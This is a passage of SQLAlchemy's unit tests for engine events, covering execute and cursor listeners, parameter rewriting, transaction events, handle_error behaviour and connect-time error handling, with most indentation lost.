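        e1 = testing_engine(config.db_url)
        order = []
        event.listen(e1, "connect", lambda *a: order.append("second"))
        event.listen(
            e1, "connect", lambda *a: order.append("first"), insert=True
        )
        with e1.connect():
            pass
        eq_(order, ["first", "second"])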
def test_new_exec_driver_sql_no_events(self):
m1 = Mock()
def select1(db):
return str(select(1).compile(dialect=db.dialect))
with testing.db.connect() as conn:
event.listen(conn, "before_execute", m1.before_execute)
event.listen(conn, "after_execute", m1.after_execute)
conn.exec_driver_sql(select1(testing.db))
eq_(m1.mock_calls, [])
def test_add_event_after_connect(self, testing_engine):
# new feature as of #2978
canary = Mock()
e1 = testing_engine(config.db_url, future=False)
assert not e1._has_events
conn = e1.connect()
event.listen(e1, "before_execute", canary.be1)
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
def test_force_conn_events_false(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url, future=False)
assert not e1._has_events
event.listen(e1, "before_execute", canary.be1)
conn = e1._connection_cls(
e1, connection=e1.raw_connection(), _has_events=False
)
conn.execute(select(1))
eq_(canary.be1.call_count, 0)
def test_cursor_events_ctx_execute_scalar(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_cursor_execute", canary.bce)
event.listen(e1, "after_cursor_execute", canary.ace)
stmt = str(select(1).compile(dialect=e1.dialect))
with e1.connect() as conn:
dialect = conn.dialect
ctx = dialect.execution_ctx_cls._init_statement(
dialect, conn, conn.connection, {}, stmt, {}
)
ctx._execute_scalar(stmt, Integer())
eq_(
canary.bce.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
eq_(
canary.ace.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
def test_cursor_events_execute(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_cursor_execute", canary.bce)
event.listen(e1, "after_cursor_execute", canary.ace)
stmt = str(select(1).compile(dialect=e1.dialect))
with e1.connect() as conn:
result = conn.exec_driver_sql(stmt)
eq_(result.scalar(), 1)
ctx = result.context
eq_(
canary.bce.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
eq_(
canary.ace.mock_calls,
[call(conn, ctx.cursor, stmt, ctx.parameters[0], ctx, False)],
)
@testing.combinations(
(
([{"x": 5, "y": 10}, {"x": 8, "y": 9}],),
{},
[{"x": 5, "y": 10}, {"x": 8, "y": 9}],
{},
),
(({"z": 10},), {}, [], {"z": 10}),
argnames="multiparams, params, expected_multiparams, expected_params",
)
def test_modify_parameters_from_event_one(
self,
multiparams,
params,
expected_multiparams,
expected_params,
testing_engine,
):
# this is testing both the normalization added to parameters
# as of I97cb4d06adfcc6b889f10d01cc7775925cffb116 as well as
# that the return value from the event is taken as the new set
# of parameters.
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
eq_(multiparams, expected_multiparams)
eq_(params, expected_params)
return clauseelement, (), {"q": "15"}
def after_execute(
conn, clauseelement, multiparams, params, result, execution_options
):
eq_(multiparams, ())
eq_(params, {"q": "15"})
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute, retval=True)
event.listen(e1, "after_execute", after_execute)
with e1.connect() as conn:
result = conn.execute(
select(bindparam("q", type_=String)), *multiparams, **params
)
eq_(result.all(), [("15",)])
@testing.provide_metadata
def test_modify_parameters_from_event_two(self, connection):
t = Table("t", self.metadata, Column("q", Integer))
t.create(connection)
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
return clauseelement, [{"q": 15}, {"q": 19}], {}
event.listen(connection, "before_execute", before_execute, retval=True)
connection.execute(t.insert(), {"q": 12})
event.remove(connection, "before_execute", before_execute)
eq_(
connection.execute(select(t).order_by(t.c.q)).fetchall(),
[(15,), (19,)],
)
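    # A condensed sketch of the retval=True contract used above: the
    # listener returns (clauseelement, multiparams, params), and the
    # returned values replace what execute() was originally given.
    def _sketch_before_execute_retval(self, connection):
        @event.listens_for(connection, "before_execute", retval=True)
        def rewrite(
            conn, clauseelement, multiparams, params, execution_options
        ):
            # leave the statement alone, substitute the parameters
            return clauseelement, (), {"q": 42}
        eq_(connection.scalar(select(bindparam("q", type_=Integer))), 42)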
def test_modify_parameters_from_event_three(
self, connection, testing_engine
):
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
return clauseelement, [{"q": 15}, {"q": 19}], {"q": 7}
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute, retval=True)
with expect_raises_message(
tsa.exc.InvalidRequestError,
"Event handler can't return non-empty multiparams "
"and params at the same time",
):
with e1.connect() as conn:
conn.execute(select(literal("1")))
@testing.only_on("sqlite")
def test_dont_modify_statement_driversql(self, connection):
m1 = mock.Mock()
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
m1.run_event()
return clauseelement.replace("hi", "there"), multiparams, params
# the event does not take effect for the "driver SQL" option
eq_(connection.exec_driver_sql("select 'hi'").scalar(), "hi")
# event is not called at all
eq_(m1.mock_calls, [])
@testing.only_on("sqlite")
def test_modify_statement_internal_driversql(self, connection):
m1 = mock.Mock()
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
m1.run_event()
return clauseelement.replace("hi", "there"), multiparams, params
eq_(
connection.exec_driver_sql("select 'hi'").scalar(),
"hi",
)
eq_(m1.mock_calls, [])
def test_modify_statement_clauseelement(self, connection):
@event.listens_for(connection, "before_execute", retval=True)
def _modify(
conn, clauseelement, multiparams, params, execution_options
):
return select(literal_column("'there'")), multiparams, params
eq_(connection.scalar(select(literal_column("'hi'"))), "there")
def test_argument_format_execute(self, testing_engine):
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
assert isinstance(multiparams, (list, tuple))
assert isinstance(params, collections_abc.Mapping)
def after_execute(
conn, clauseelement, multiparams, params, result, execution_options
):
assert isinstance(multiparams, (list, tuple))
assert isinstance(params, collections_abc.Mapping)
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", before_execute)
event.listen(e1, "after_execute", after_execute)
with e1.connect() as conn:
conn.execute(select(1))
conn.execute(select(1).compile(dialect=e1.dialect).statement)
conn.execute(select(1).compile(dialect=e1.dialect))
conn._execute_compiled(
select(1).compile(dialect=e1.dialect), (), {}
)
def test_execute_events(self):
stmts = []
cursor_stmts = []
def execute(
conn, clauseelement, multiparams, params, execution_options
):
stmts.append((str(clauseelement), params, multiparams))
def cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
cursor_stmts.append((str(statement), parameters, None))
# TODO: this test is kind of a mess
for engine in [
engines.testing_engine(),
engines.testing_engine().connect(),
]:
event.listen(engine, "before_execute", execute)
event.listen(engine, "before_cursor_execute", cursor_execute)
m = MetaData()
t1 = Table(
"t1",
m,
Column("c1", Integer, primary_key=True),
Column(
"c2",
String(50),
default=func.lower("Foo"),
primary_key=True,
),
implicit_returning=False,
)
if isinstance(engine, Connection):
ctx = None
conn = engine
else:
ctx = conn = engine.connect()
trans = conn.begin()
try:
m.create_all(conn, checkfirst=False)
try:
conn.execute(t1.insert(), dict(c1=5, c2="some data"))
conn.execute(t1.insert(), dict(c1=6))
eq_(
conn.execute(text("select * from t1")).fetchall(),
[(5, "some data"), (6, "foo")],
)
finally:
m.drop_all(conn)
trans.commit()
finally:
if ctx:
ctx.close()
compiled = [
("CREATE TABLE t1", {}, None),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "some data", "c1": 5},
(),
),
("INSERT INTO t1 (c1, c2)", {"c1": 6}, ()),
("select * from t1", {}, None),
("DROP TABLE t1", {}, None),
]
cursor = [
("CREATE TABLE t1", {}, ()),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "some data", "c1": 5},
(5, "some data"),
),
("SELECT lower", {"lower_2": "Foo"}, ("Foo",)),
(
"INSERT INTO t1 (c1, c2)",
{"c2": "foo", "c1": 6},
(6, "foo"),
),
("select * from t1", {}, ()),
("DROP TABLE t1", {}, ()),
]
self._assert_stmts(compiled, stmts)
self._assert_stmts(cursor, cursor_stmts)
def test_options(self):
canary = []
def execute(conn, *args, **kw):
canary.append("execute")
def cursor_execute(conn, *args, **kw):
canary.append("cursor_execute")
engine = engines.testing_engine()
event.listen(engine, "before_execute", execute)
event.listen(engine, "before_cursor_execute", cursor_execute)
conn = engine.connect()
c2 = conn.execution_options(foo="bar")
eq_(c2._execution_options, {"foo": "bar"})
c2.execute(select(1))
c3 = c2.execution_options(bar="bat")
eq_(c3._execution_options, {"foo": "bar", "bar": "bat"})
eq_(canary, ["execute", "cursor_execute"])
@testing.requires.ad_hoc_engines
def test_generative_engine_event_dispatch(self):
canary = []
def l1(*arg, **kw):
canary.append("l1")
def l2(*arg, **kw):
canary.append("l2")
def l3(*arg, **kw):
canary.append("l3")
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
event.listen(eng, "before_execute", l1)
eng1 = eng.execution_options(foo="b1")
event.listen(eng, "before_execute", l2)
event.listen(eng1, "before_execute", l3)
with eng.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2"])
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3", "l1", "l2"])
@testing.requires.ad_hoc_engines
def test_clslevel_engine_event_options(self):
canary = []
def l1(*arg, **kw):
canary.append("l1")
def l2(*arg, **kw):
canary.append("l2")
def l3(*arg, **kw):
canary.append("l3")
def l4(*arg, **kw):
canary.append("l4")
event.listen(Engine, "before_execute", l1)
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
event.listen(eng, "before_execute", l2)
eng1 = eng.execution_options(foo="b1")
event.listen(eng, "before_execute", l3)
event.listen(eng1, "before_execute", l4)
with eng.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3"])
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l1", "l2", "l3", "l4", "l1", "l2", "l3"])
canary[:] = []
event.remove(Engine, "before_execute", l1)
event.remove(eng1, "before_execute", l4)
event.remove(eng, "before_execute", l3)
with eng1.connect() as conn:
conn.execute(select(1))
eq_(canary, ["l2"])
@testing.requires.ad_hoc_engines
def test_cant_listen_to_option_engine(self):
from sqlalchemy.engine import base
def evt(*arg, **kw):
pass
assert_raises_message(
tsa.exc.InvalidRequestError,
r"Can't assign an event directly to the "
"<class 'sqlalchemy.engine.base.OptionEngine'> class",
event.listen,
base.OptionEngine,
"before_cursor_execute",
evt,
)
@testing.requires.ad_hoc_engines
def test_dispose_event(self, testing_engine):
canary = Mock()
eng = testing_engine(testing.db.url)
event.listen(eng, "engine_disposed", canary)
conn = eng.connect()
conn.close()
eng.dispose()
conn = eng.connect()
conn.close()
eq_(canary.mock_calls, [call(eng)])
eng.dispose()
eq_(canary.mock_calls, [call(eng), call(eng)])
@testing.requires.ad_hoc_engines
@testing.combinations(True, False, argnames="close")
def test_close_parameter(self, testing_engine, close):
eng = testing_engine(
options=dict(pool_size=1, max_overflow=0, poolclass=QueuePool)
)
conn = eng.connect()
dbapi_conn_one = conn.connection.dbapi_connection
conn.close()
eng_copy = copy.copy(eng)
eng_copy.dispose(close=close)
copy_conn = eng_copy.connect()
dbapi_conn_two = copy_conn.connection.dbapi_connection
is_not(dbapi_conn_one, dbapi_conn_two)
conn = eng.connect()
if close:
is_not(dbapi_conn_one, conn.connection.dbapi_connection)
else:
is_(dbapi_conn_one, conn.connection.dbapi_connection)
def test_retval_flag(self):
canary = []
def tracker(name):
def go(conn, *args, **kw):
canary.append(name)
return go
def execute(
conn, clauseelement, multiparams, params, execution_options
):
canary.append("execute")
return clauseelement, multiparams, params
def cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
canary.append("cursor_execute")
return statement, parameters
engine = engines.testing_engine()
assert_raises(
tsa.exc.ArgumentError,
event.listen,
engine,
"begin",
tracker("begin"),
retval=True,
)
event.listen(engine, "before_execute", execute, retval=True)
event.listen(
engine, "before_cursor_execute", cursor_execute, retval=True
)
with engine.connect() as conn:
conn.execute(select(1))
eq_(canary, ["execute", "cursor_execute"])
def test_execution_options(self):
engine = engines.testing_engine()
engine_tracker = Mock()
conn_tracker = Mock()
event.listen(engine, "set_engine_execution_options", engine_tracker)
event.listen(engine, "set_connection_execution_options", conn_tracker)
e2 = engine.execution_options(e1="opt_e1")
c1 = engine.connect()
c2 = c1.execution_options(c1="opt_c1")
c3 = e2.connect()
c4 = c3.execution_options(c3="opt_c3")
eq_(engine_tracker.mock_calls, [call(e2, {"e1": "opt_e1"})])
eq_(
conn_tracker.mock_calls,
[call(c2, {"c1": "opt_c1"}), call(c4, {"c3": "opt_c3"})],
)
def test_execution_options_modify_inplace(self):
engine = engines.testing_engine()
@event.listens_for(engine, "set_engine_execution_options")
def engine_tracker(conn, opt):
opt["engine_tracked"] = True
@event.listens_for(engine, "set_connection_execution_options")
def conn_tracker(conn, opt):
opt["conn_tracked"] = True
with mock.patch.object(
engine.dialect, "set_connection_execution_options"
) as conn_opt, mock.patch.object(
engine.dialect, "set_engine_execution_options"
) as engine_opt:
e2 = engine.execution_options(e1="opt_e1")
c1 = engine.connect()
c2 = c1.execution_options(c1="opt_c1")
is_not(e2, engine)
is_(c1, c2)
eq_(e2._execution_options, {"e1": "opt_e1", "engine_tracked": True})
eq_(c2._execution_options, {"c1": "opt_c1", "conn_tracked": True})
eq_(
engine_opt.mock_calls,
[mock.call(e2, {"e1": "opt_e1", "engine_tracked": True})],
)
eq_(
conn_opt.mock_calls,
[mock.call(c1, {"c1": "opt_c1", "conn_tracked": True})],
)
@testing.requires.sequences
@testing.provide_metadata
def test_cursor_execute(self):
canary = []
def tracker(name):
def go(conn, cursor, statement, parameters, context, executemany):
canary.append((statement, context))
return go
engine = engines.testing_engine()
t = Table(
"t",
self.metadata,
Column(
"x",
Integer,
Sequence("t_id_seq"),
primary_key=True,
),
implicit_returning=False,
)
self.metadata.create_all(engine)
with engine.begin() as conn:
event.listen(
conn, "before_cursor_execute", tracker("cursor_execute")
)
conn.execute(t.insert())
# we see the sequence pre-executed in the first call
assert "t_id_seq" in canary[0][0]
assert "INSERT" in canary[1][0]
# same context
is_(canary[0][1], canary[1][1])
def test_transactional(self):
canary = []
def tracker(name):
def go(conn, *args, **kw):
canary.append(name)
return go
engine = engines.testing_engine()
event.listen(engine, "before_execute", tracker("execute"))
event.listen(
engine, "before_cursor_execute", tracker("cursor_execute")
)
event.listen(engine, "begin", tracker("begin"))
event.listen(engine, "commit", tracker("commit"))
event.listen(engine, "rollback", tracker("rollback"))
with engine.connect() as conn:
trans = conn.begin()
conn.execute(select(1))
trans.rollback()
trans = conn.begin()
conn.execute(select(1))
trans.commit()
eq_(
canary,
[
"begin",
"execute",
"cursor_execute",
"rollback",
"begin",
"execute",
"cursor_execute",
"commit",
],
)
def test_transactional_named(self):
canary = []
def tracker(name):
def go(*args, **kw):
canary.append((name, set(kw)))
return go
engine = engines.testing_engine()
event.listen(engine, "before_execute", tracker("execute"), named=True)
event.listen(
engine,
"before_cursor_execute",
tracker("cursor_execute"),
named=True,
)
event.listen(engine, "begin", tracker("begin"), named=True)
event.listen(engine, "commit", tracker("commit"), named=True)
event.listen(engine, "rollback", tracker("rollback"), named=True)
with engine.connect() as conn:
trans = conn.begin()
conn.execute(select(1))
trans.rollback()
trans = conn.begin()
conn.execute(select(1))
trans.commit()
eq_(
canary,
[
("begin", set(["conn"])),
(
"execute",
set(
[
"conn",
"clauseelement",
"multiparams",
"params",
"execution_options",
]
),
),
(
"cursor_execute",
set(
[
"conn",
"cursor",
"executemany",
"statement",
"parameters",
"context",
]
),
),
("rollback", set(["conn"])),
("begin", set(["conn"])),
(
"execute",
set(
[
"conn",
"clauseelement",
"multiparams",
"params",
"execution_options",
]
),
),
(
"cursor_execute",
set(
[
"conn",
"cursor",
"executemany",
"statement",
"parameters",
"context",
]
),
),
("commit", set(["conn"])),
],
)
@testing.requires.savepoints
@testing.requires.two_phase_transactions
def test_transactional_advanced(self):
canary1 = []
def tracker1(name):
def go(*args, **kw):
canary1.append(name)
return go
canary2 = []
def tracker2(name):
def go(*args, **kw):
canary2.append(name)
return go
engine = engines.testing_engine()
for name in [
"begin",
"savepoint",
"rollback_savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
]:
event.listen(engine, "%s" % name, tracker1(name))
conn = engine.connect()
for name in [
"begin",
"savepoint",
"rollback_savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
]:
event.listen(conn, "%s" % name, tracker2(name))
trans = conn.begin()
trans2 = conn.begin_nested()
conn.execute(select(1))
trans2.rollback()
trans2 = conn.begin_nested()
conn.execute(select(1))
trans2.commit()
trans.rollback()
trans = conn.begin_twophase()
conn.execute(select(1))
trans.prepare()
trans.commit()
eq_(
canary1,
[
"begin",
"savepoint",
"rollback_savepoint",
"savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
],
)
eq_(
canary2,
[
"begin",
"savepoint",
"rollback_savepoint",
"savepoint",
"release_savepoint",
"rollback",
"begin_twophase",
"prepare_twophase",
"commit_twophase",
],
)
class HandleErrorTest(fixtures.TestBase):
__requires__ = ("ad_hoc_engines",)
__backend__ = True
def teardown_test(self):
Engine.dispatch._clear()
Engine._has_events = False
def test_handle_error(self):
engine = engines.testing_engine()
canary = Mock(return_value=None)
event.listen(engine, "handle_error", canary)
with engine.connect() as conn:
try:
conn.exec_driver_sql("SELECT FOO FROM I_DONT_EXIST")
assert False
except tsa.exc.DBAPIError as e:
ctx = canary.mock_calls[0][1][0]
eq_(ctx.original_exception, e.orig)
is_(ctx.sqlalchemy_exception, e)
eq_(ctx.statement, "SELECT FOO FROM I_DONT_EXIST")
def test_exception_event_reraise(self):
engine = engines.testing_engine()
class MyException(Exception):
pass
@event.listens_for(engine, "handle_error", retval=True)
def err(context):
stmt = context.statement
exception = context.original_exception
if "ERROR ONE" in str(stmt):
return MyException("my exception")
elif "ERROR TWO" in str(stmt):
return exception
else:
return None
conn = engine.connect()
# case 1: custom exception
assert_raises_message(
MyException,
"my exception",
conn.exec_driver_sql,
"SELECT 'ERROR ONE' FROM I_DONT_EXIST",
)
# case 2: return the DBAPI exception we're given;
# no wrapping should occur
assert_raises(
conn.dialect.dbapi.Error,
conn.exec_driver_sql,
"SELECT 'ERROR TWO' FROM I_DONT_EXIST",
)
# case 3: normal wrapping
assert_raises(
tsa.exc.DBAPIError,
conn.exec_driver_sql,
"SELECT 'ERROR THREE' FROM I_DONT_EXIST",
)
def test_exception_event_reraise_chaining(self):
engine = engines.testing_engine()
class MyException1(Exception):
pass
class MyException2(Exception):
pass
class MyException3(Exception):
pass
@event.listens_for(engine, "handle_error", retval=True)
def err1(context):
stmt = context.statement
if (
"ERROR ONE" in str(stmt)
or "ERROR TWO" in str(stmt)
or "ERROR THREE" in str(stmt)
):
return MyException1("my exception")
elif "ERROR FOUR" in str(stmt):
raise MyException3("my exception short circuit")
@event.listens_for(engine, "handle_error", retval=True)
def err2(context):
stmt = context.statement
if (
"ERROR ONE" in str(stmt) or "ERROR FOUR" in str(stmt)
) and isinstance(context.chained_exception, MyException1):
raise MyException2("my exception chained")
elif "ERROR TWO" in str(stmt):
return context.chained_exception
else:
return None
conn = engine.connect()
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises_message(
MyException2,
"my exception chained",
conn.exec_driver_sql,
"SELECT 'ERROR ONE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises(
MyException1,
conn.exec_driver_sql,
"SELECT 'ERROR TWO' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
# test that non None from err1 isn't cancelled out
# by err2
assert_raises(
MyException1,
conn.exec_driver_sql,
"SELECT 'ERROR THREE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises(
tsa.exc.DBAPIError,
conn.exec_driver_sql,
"SELECT 'ERROR FIVE' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
with patch.object(
engine.dialect.execution_ctx_cls, "handle_dbapi_exception"
) as patched:
assert_raises_message(
MyException3,
"my exception short circuit",
conn.exec_driver_sql,
"SELECT 'ERROR FOUR' FROM I_DONT_EXIST",
)
eq_(patched.call_count, 1)
@testing.only_on("sqlite", "using specific DB message")
def test_exception_no_autorollback(self):
"""with the 2.0 engine, a SQL statement will have run
"autobegin", so that we are in a transaction. so if an error
occurs, we report the error but stay in the transaction.
previously, we'd see the rollback failing due to autorollback
when transaction isn't started.
"""
engine = engines.testing_engine()
conn = engine.connect()
def boom(connection):
raise engine.dialect.dbapi.OperationalError("rollback failed")
with patch.object(conn.dialect, "do_rollback", boom):
assert_raises_message(
tsa.exc.OperationalError,
"no such table: i_dont_exist",
conn.exec_driver_sql,
"insert into i_dont_exist (x) values ('y')",
)
# we're still in a transaction
assert conn._transaction
# only fails when we actually call rollback
assert_raises_message(
tsa.exc.OperationalError,
"rollback failed",
conn.rollback,
)
def test_actual_autorollback(self):
"""manufacture an autorollback scenario that works in 2.x."""
engine = engines.testing_engine()
conn = engine.connect()
def boom(connection):
raise engine.dialect.dbapi.OperationalError("rollback failed")
@event.listens_for(conn, "begin")
def _do_begin(conn):
# run a breaking statement before begin actually happens
conn.exec_driver_sql("insert into i_dont_exist (x) values ('y')")
with patch.object(conn.dialect, "do_rollback", boom):
assert_raises_message(
tsa.exc.OperationalError,
"rollback failed",
conn.begin,
)
def test_exception_event_ad_hoc_context(self):
"""test that handle_error is called with a context in
cases where _handle_dbapi_error() is normally called without
any context.
"""
engine = engines.testing_engine()
listener = Mock(return_value=None)
event.listen(engine, "handle_error", listener)
nope = SomeException("nope")
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise nope
with engine.connect() as conn:
assert_raises_message(
tsa.exc.StatementError,
r"\(.*.SomeException\) " r"nope\n\[SQL\: u?SELECT 1 ",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
ctx = listener.mock_calls[0][1][0]
assert ctx.statement.startswith("SELECT 1 ")
is_(ctx.is_disconnect, False)
is_(ctx.original_exception, nope)
def test_exception_event_non_dbapi_error(self):
"""test that handle_error is called with a context in
cases where DBAPI raises an exception that is not a DBAPI
exception, e.g. internal errors or encoding problems.
"""
engine = engines.testing_engine()
listener = Mock(return_value=None)
event.listen(engine, "handle_error", listener)
nope = TypeError("I'm not a DBAPI error")
with engine.connect() as c:
c.connection.cursor = Mock(
return_value=Mock(execute=Mock(side_effect=nope))
)
assert_raises_message(
TypeError,
"I'm not a DBAPI error",
c.exec_driver_sql,
"select ",
)
ctx = listener.mock_calls[0][1][0]
eq_(ctx.statement, "select ")
is_(ctx.is_disconnect, False)
is_(ctx.original_exception, nope)
def test_exception_event_disable_handlers(self):
engine = engines.testing_engine()
class MyException1(Exception):
pass
@event.listens_for(engine, "handle_error")
def err1(context):
stmt = context.statement
if "ERROR_ONE" in str(stmt):
raise MyException1("my exception short circuit")
with engine.connect() as conn:
assert_raises(
tsa.exc.DBAPIError,
conn.execution_options(
skip_user_error_events=True
).exec_driver_sql,
"SELECT ERROR_ONE FROM I_DONT_EXIST",
)
assert_raises(
MyException1,
conn.execution_options(
skip_user_error_events=False
).exec_driver_sql,
"SELECT ERROR_ONE FROM I_DONT_EXIST",
)
def _test_alter_disconnect(self, orig_error, evt_value):
engine = engines.testing_engine()
@event.listens_for(engine, "handle_error")
def evt(ctx):
ctx.is_disconnect = evt_value
with patch.object(
engine.dialect, "is_disconnect", Mock(return_value=orig_error)
):
with engine.connect() as c:
try:
c.exec_driver_sql("SELECT x FROM nonexistent")
assert False
except tsa.exc.StatementError as st:
eq_(st.connection_invalidated, evt_value)
def test_alter_disconnect_to_true(self):
self._test_alter_disconnect(False, True)
self._test_alter_disconnect(True, True)
def test_alter_disconnect_to_false(self):
self._test_alter_disconnect(True, False)
self._test_alter_disconnect(False, False)
@testing.requires.independent_connections
def _test_alter_invalidate_pool_to_false(self, set_to_false):
orig_error = True
engine = engines.testing_engine()
@event.listens_for(engine, "handle_error")
def evt(ctx):
if set_to_false:
ctx.invalidate_pool_on_disconnect = False
c1, c2, c3 = (
engine.pool.connect(),
engine.pool.connect(),
engine.pool.connect(),
)
crecs = [conn._connection_record for conn in (c1, c2, c3)]
c1.close()
c2.close()
c3.close()
with patch.object(
engine.dialect, "is_disconnect", Mock(return_value=orig_error)
):
with engine.connect() as c:
target_crec = c.connection._connection_record
try:
c.exec_driver_sql("SELECT x FROM nonexistent")
assert False
except tsa.exc.StatementError as st:
eq_(st.connection_invalidated, True)
for crec in crecs:
if crec is target_crec or not set_to_false:
is_not(crec.dbapi_connection, crec.get_connection())
else:
is_(crec.dbapi_connection, crec.get_connection())
def test_alter_invalidate_pool_to_false(self):
self._test_alter_invalidate_pool_to_false(True)
def test_alter_invalidate_pool_stays_true(self):
self._test_alter_invalidate_pool_to_false(False)
def test_handle_error_event_connect_isolation_level(self):
engine = engines.testing_engine()
class MySpecialException(Exception):
pass
@event.listens_for(engine, "handle_error")
def handle_error(ctx):
raise MySpecialException("failed operation")
ProgrammingError = engine.dialect.dbapi.ProgrammingError
with engine.connect() as conn:
with patch.object(
conn.dialect,
"get_isolation_level",
Mock(side_effect=ProgrammingError("random error")),
):
assert_raises(MySpecialException, conn.get_isolation_level)
@testing.only_on("sqlite+pysqlite")
def test_cursor_close_resultset_failed_connectionless(self):
engine = engines.testing_engine()
the_conn = []
the_cursor = []
@event.listens_for(engine, "after_cursor_execute")
def go(
connection, cursor, statement, parameters, context, executemany
):
the_cursor.append(cursor)
the_conn.append(connection)
with mock.patch(
"sqlalchemy.engine.cursor.CursorResult.__init__",
Mock(side_effect=tsa.exc.InvalidRequestError("duplicate col")),
):
with engine.connect() as conn:
assert_raises(
tsa.exc.InvalidRequestError,
conn.execute,
text("select 1"),
)
# cursor is closed
assert_raises_message(
engine.dialect.dbapi.ProgrammingError,
"Cannot operate on a closed cursor",
the_cursor[0].execute,
"select 1",
)
# connection is closed
assert the_conn[0].closed
@testing.only_on("sqlite+pysqlite")
def test_cursor_close_resultset_failed_explicit(self):
engine = engines.testing_engine()
the_cursor = []
@event.listens_for(engine, "after_cursor_execute")
def go(
connection, cursor, statement, parameters, context, executemany
):
the_cursor.append(cursor)
conn = engine.connect()
with mock.patch(
"sqlalchemy.engine.cursor.CursorResult.__init__",
Mock(side_effect=tsa.exc.InvalidRequestError("duplicate col")),
):
assert_raises(
tsa.exc.InvalidRequestError,
conn.execute,
text("select 1"),
)
# cursor is closed
assert_raises_message(
engine.dialect.dbapi.ProgrammingError,
"Cannot operate on a closed cursor",
the_cursor[0].execute,
"select 1",
)
# connection not closed
assert not conn.closed
conn.close()
class OnConnectTest(fixtures.TestBase):
__requires__ = ("sqlite",)
def setup_test(self):
e = create_engine("sqlite://")
connection = Mock(get_server_version_info=Mock(return_value="5.0"))
def connect(*args, **kwargs):
return connection
dbapi = Mock(
sqlite_version_info=(99, 9, 9),
version_info=(99, 9, 9),
sqlite_version="99.9.9",
paramstyle="named",
connect=Mock(side_effect=connect),
)
sqlite3 = e.dialect.dbapi
dbapi.Error = (sqlite3.Error,)
dbapi.ProgrammingError = sqlite3.ProgrammingError
self.dbapi = dbapi
self.ProgrammingError = sqlite3.ProgrammingError
def test_wraps_connect_in_dbapi(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
try:
create_engine("sqlite://", module=dbapi).connect()
assert False
except tsa.exc.DBAPIError as de:
assert not de.connection_invalidated
def test_handle_error_event_connect(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is None
raise MySpecialException("failed operation")
assert_raises(MySpecialException, eng.connect)
def test_handle_error_event_revalidate(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi, _initialize=False)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is conn
assert isinstance(
ctx.sqlalchemy_exception, tsa.exc.ProgrammingError
)
raise MySpecialException("failed operation")
conn = eng.connect()
conn.invalidate()
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
assert_raises(MySpecialException, getattr, conn, "connection")
def test_handle_error_event_implicit_revalidate(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi, _initialize=False)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is conn
assert isinstance(
ctx.sqlalchemy_exception, tsa.exc.ProgrammingError
)
raise MySpecialException("failed operation")
conn = eng.connect()
conn.invalidate()
dbapi.connect = Mock(side_effect=self.ProgrammingError("random error"))
assert_raises(MySpecialException, conn.execute, select(1))
def test_handle_error_custom_connect(self):
dbapi = self.dbapi
class MySpecialException(Exception):
pass
def custom_connect():
raise self.ProgrammingError("random error")
eng = create_engine("sqlite://", module=dbapi, creator=custom_connect)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.engine is eng
assert ctx.connection is None
raise MySpecialException("failed operation")
assert_raises(MySpecialException, eng.connect)
def test_handle_error_event_connect_invalidate_flag(self):
dbapi = self.dbapi
